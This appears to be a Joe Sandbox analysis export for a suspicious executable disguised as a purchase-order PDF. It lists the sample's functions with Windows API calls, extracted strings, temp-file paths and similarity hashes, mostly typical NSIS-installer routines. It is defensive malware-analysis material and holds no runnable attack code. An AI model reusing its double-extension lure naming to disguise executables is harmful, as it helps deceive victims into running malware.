Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
GetDlgItem.USER32(?,000003E8), ref: 00404368
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
GetSysColor.USER32(?), ref: 00404396
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
lstrlenW.KERNEL32(?), ref: 004043B7
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
GetDlgItem.USER32(?,0000040A), ref: 00404432
SendMessageW.USER32(00000000), ref: 00404439
GetDlgItem.USER32(?,000003E8), ref: 00404464
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044B8
ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
SetCursor.USER32(00000000), ref: 004044DC
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D

Strings

open, xrefs: 004044C5
N, xrefs: 00404452
-B@, xrefs: 004044C2
Call, xrefs: 00404493

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: -B@$Call$N$open
API String ID: 3615053054-1446803726
Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4

Function 00405D84 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0

Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
wsprintfA.USER32 ref: 00405DFB
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 00405E36
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E45
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
GlobalFree.KERNEL32(00000000), ref: 00405EE4
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB

Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Strings

[Rename], xrefs: 00405E65, 00405E77
NUL, xrefs: 00405D8D
%ls=%ls, xrefs: 00405DF1

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD

Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Strings

@Hmu, xrefs: 100023CB

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 004062E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373

Strings

*?|<>/":, xrefs: 0040633B
C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe", xrefs: 0040632D

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3160791963
Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED

Function 00404180 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040419D
GetSysColor.USER32(00000000), ref: 004041B9
SetTextColor.GDI32(?,00000000), ref: 004041C5
SetBkMode.GDI32(?,?), ref: 004041D1
GetSysColor.USER32(?), ref: 004041E4
SetBkColor.GDI32(?,?), ref: 004041F4
DeleteObject.GDI32(?), ref: 0040420E
CreateBrushIndirect.GDI32(?), ref: 00404218

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64

Function 004051B4 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8

Function 00404A7E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
GetMessagePos.USER32 ref: 00404AA1
ScreenToClient.USER32(?,?), ref: 00404ABB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3

Strings

f, xrefs: 00404ACF

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(0007803D,00000064,00078041), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Strings

Calibri, xrefs: 00401DB7

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

